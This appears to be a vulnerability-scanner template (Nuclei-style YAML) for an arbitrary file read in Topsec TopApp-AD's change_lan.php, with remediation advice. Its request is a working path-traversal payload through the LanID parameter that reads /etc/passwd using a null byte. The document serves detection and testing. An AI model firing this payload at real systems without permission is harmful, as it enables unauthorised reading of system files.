id: TopApp-AD_change_lan_php-FileRead
info:
  name: Topsec TopApp-AD change_lan.php LanID parameter file read vulnerability
  author:
  - l0ne1y
  description: |-
    Topsec TopApp-AD change_lan.php arbitrary file read vulnerability
    Topsec TopApp-AD application delivery system is the application delivery device with the most complete functionality in the industry.

    Topsec TopApp-AD has an arbitrary file read vulnerability. Attackers can exploit it to read arbitrary file contents.
  severity: medium
  remediation: |-
    Official remedy:
    1. It is recommended that users obtain the latest patch or the latest version program from the official website:
    https://www.topsec.com.cn/

    Temporary remedy:
    1. Filter "." so that users cannot traverse to parent directories in the URL.
    2. Use regular expressions to strictly validate the format of user input parameters, hard-code or uniformly encode the file name parameters passed by users, control file types via a whitelist, and reject parameters containing malicious or empty characters.
    3. Prohibit the system from providing directory traversal services, e.g., configure open_basedir in php.ini to limit the file access scope.
    4. Store file paths in the database and let users submit the file ID to download files.
    5. Perform permission checks before users download files.
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"bin/ash")
  path:
  - '{{BaseURL}}/change_lan.php?LanID=../../../../../../../../../etc/passwd%00'
  method: GET
